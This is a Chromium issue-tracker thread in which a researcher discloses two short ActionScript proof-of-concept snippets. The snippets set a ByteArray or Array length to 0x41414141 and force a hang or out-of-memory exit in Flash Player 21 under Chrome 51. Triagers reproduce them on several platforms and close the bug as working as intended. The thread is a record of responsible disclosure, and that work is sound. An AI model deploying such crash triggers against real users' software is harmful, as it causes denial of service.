Chromium VRP does reward for exploitable bugs in Chrome components - see https://www.google.com/about/appsecurity/chrome-rewards/index.html

"We'd also love to learn about bugs in third-party components that we ship or use (e.g. PDFium, Adobe Flash, Linux kernel)."

Please also be aware of the following FAQ answer:

https://www.chromium.org/Home/chromium-security/security-faq#TOC-Are-denial-of-service-issues-considered-security-bugs-

This is issue is just DOS not code executable is this still relevant?

We are still interested in DOS issues as these are likely bugs. I recommend you report it.

It causes "out of memory" exception but no access violation etc.. if you still believe it worthy I will send the details. Thank you for the replies.

If you send the details, we will triage it as a stability bug (not as a security bug). Please do send it along.

Sent via gmail last Friday I don't think it was received so re-posting here...

Ok I am sending you some details, just let you know I had already reported to Adobe along with some other issues I found but since it also affects FlashPlayer Chrome too I felt it was best to notify chromium as well. I hope this is helpful.

Regards,
John Page (hyp3rlinx)

POC codes
=========

// Crash #1 FlashPlayer current version 21 in Google Chrome

DOOM(new ByteArray)
function DOOM(arr:ByteArray){
	arr.writeFloat(arr.length = 0x41414141) 
	arr.writeInt(arr.position *= 0x41414141)
	
    trace(arr)   //<=== needed	
	
} 


//Crash #2 FlashPlayer current version 21 in Google Chrome

var a = new Array
trace(abc(a))
function abc(a:Array){
a.length = 0x41414141
return a.concat(a,a,a,a,a,a,a,a,a,a,a,a)
}

adobe-flash@ peeps: is it still useful to triage this in CHrome, if it has already been reported to Adobe?

Well, technically adobe-flash@ is mostly Adobe folks. Adding Natalie.

I'll leave this to the folks on the adobe-flash list, as this is a stability issue, not a security issue. 

In Chrome, an out of memory condition in Flash Player causes the plug-in to exit safely.  If we're just talking about an out of memory exit, which is what I'm gathering from the comments above, this behavior is by design.

John, can you please report/upload one of the crashes and send us the corresponding crash ID in about:crashes or about:flash?

I enabled crash reporting restarted Chrome yet see no "ID" etc... Here is FlashPlayer infos

About Flash

Google Chrome	51.0.2704.79 (m)
OS	Windows 7 or Server 2008 R2 SP1 64 bit
Flash plugin	21.0.0.242 C:\Program Files (x86)\Google\Chrome\Application\51.0.2704.79\PepperFlash\pepflashplayer.dll
--- Crash data ---
--- GPU information ---
Graphics card	Intel(R) HD Graphics Family
Driver display name	igdumd64.dll,igd10umd64.dll,igd10umd64.dll,igdumd32,igd10umd32,igd10umd32
Driver name (strong)	oem7.inf:IntelGfx.NTamd64.6.0:iSNBM0:8.15.10.2618:pci\ven_8086&dev_0116&subsys_1845103c
--- GPU driver, more information ---
Vendor Id	0x8086
Device Id	0x0116
Driver vendor	Intel Corporation
Driver version	8.15.10.2618
Driver date	1-5-2012
Pixel shader version	3.0
Vertex shader version	3.0
GL_VENDOR	Google Inc.
GL_RENDERER	ANGLE (Intel(R) HD Graphics Family Direct3D9Ex vs_3_0 ps_3_0)
GL_VERSION	OpenGL ES 2.0 (ANGLE 2.1.0.1a1b30c37e13)
GL_EXTENSIONS	GL_OES_element_index_uint GL_OES_packed_depth_stencil GL_OES_get_program_binary GL_OES_rgb8_rgba8 GL_EXT_texture_format_BGRA8888 GL_EXT_read_format_bgra GL_EXT_color_buffer_half_float GL_OES_texture_half_float GL_OES_texture_half_float_linear GL_OES_texture_float GL_OES_texture_float_linear GL_EXT_texture_compression_dxt1 GL_ANGLE_texture_compression_dxt3 GL_ANGLE_texture_compression_dxt5 GL_ANGLE_depth_texture GL_OES_depth32 GL_EXT_texture_storage GL_OES_texture_npot GL_EXT_texture_filter_anisotropic GL_EXT_occlusion_query_boolean GL_NV_fence GL_EXT_robustness GL_EXT_blend_minmax GL_ANGLE_framebuffer_blit GL_ANGLE_framebuffer_multisample GL_ANGLE_instanced_arrays GL_ANGLE_pack_reverse_row_order GL_OES_standard_derivatives GL_EXT_shader_texture_lod GL_EXT_frag_depth GL_ANGLE_texture_usage GL_ANGLE_translated_shader_source GL_EXT_debug_marker GL_OES_EGL_image GL_EXT_unpack_subimage GL_NV_pack_subimage GL_OES_vertex_array_object GL_KHR_debug

Deleted: Capture-1.JPG 26.3 KB

	Capture-1.JPG 26.3 KB View Download

@jecl... that was my initial thought as well (FP normal exit) but wanted to pass this on anyways just to be sure.

So I checked both POCs with current public FP 21.0.0.242 and my results are in-line with Jeromie's assessment.

The first POC causes a hang, but FP recovers afterwards. The second POC causes an OOM, and then FP exits safely.

  PASS: FP 21_0_r0_242 (PPAPI) in Chrome 51.0.2704.84 (32-bit) on Windows 7 x64 SP1
    * poc1: "error: out of memory" is shown when attached to FP in WinDbg.
    * poc2: "Implementation limit exceeded: attempting to allocate too-large object | error: out of memory" is shown in WinDbg.

  PASS: FP 21_0_r0_242 (PPAPI) in Chrome 51.0.2704.84 (64-bit) on Windows 8.1 x64
    * poc1: A long hang (~5 minutes) is observed, but FP recovers after that.
    * poc2: "Implementation limit exceeded: attempting to allocate too-large object | error: out of memory" is shown in WinDbg.

  PASS: FP 21_0_r0_242 (PPAPI) in Chrome 51.0.2704.84 (64-bit) on Windows 10 x64
    * poc1: A brief hang (~30 seconds) is observed, but FP recovers after that.
    * poc2: "Implementation limit exceeded: attempting to allocate too-large object | error: out of memory" is shown in WinDbg.

  PASS: FP 21_0_r0_242 (PPAPI) in Chrome 51.0.2704.79 (64-bit) on Mac OS 10.10.5 x64 x86_64
    * poc1: A brief hang (~18 seconds) is observed, but FP recovers after that.
    * poc2: "Implementation limit exceeded: attempting to allocate too-large object | error: out of memory" is shown in WinDbg.

  PASS: FP 21_0_r0_242 (PPAPI) in Chrome 51.0.2704.79 (64-bit) on Mac OS 10.11.5 x64 x86_64
    * poc1: A brief hang (~20 seconds) is observed, but FP recovers after that.
    * poc2: "Implementation limit exceeded: attempting to allocate too-large object | error: out of memory" is shown in WinDbg.

I tried once more to find the crashes in the DB hoping they may have been uploaded with some delay. I could not find them. But per 10,11, 16 and 17 I close this a working as intended.

Thank you for taking the time to look at this.

John, thank you for reporting!

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot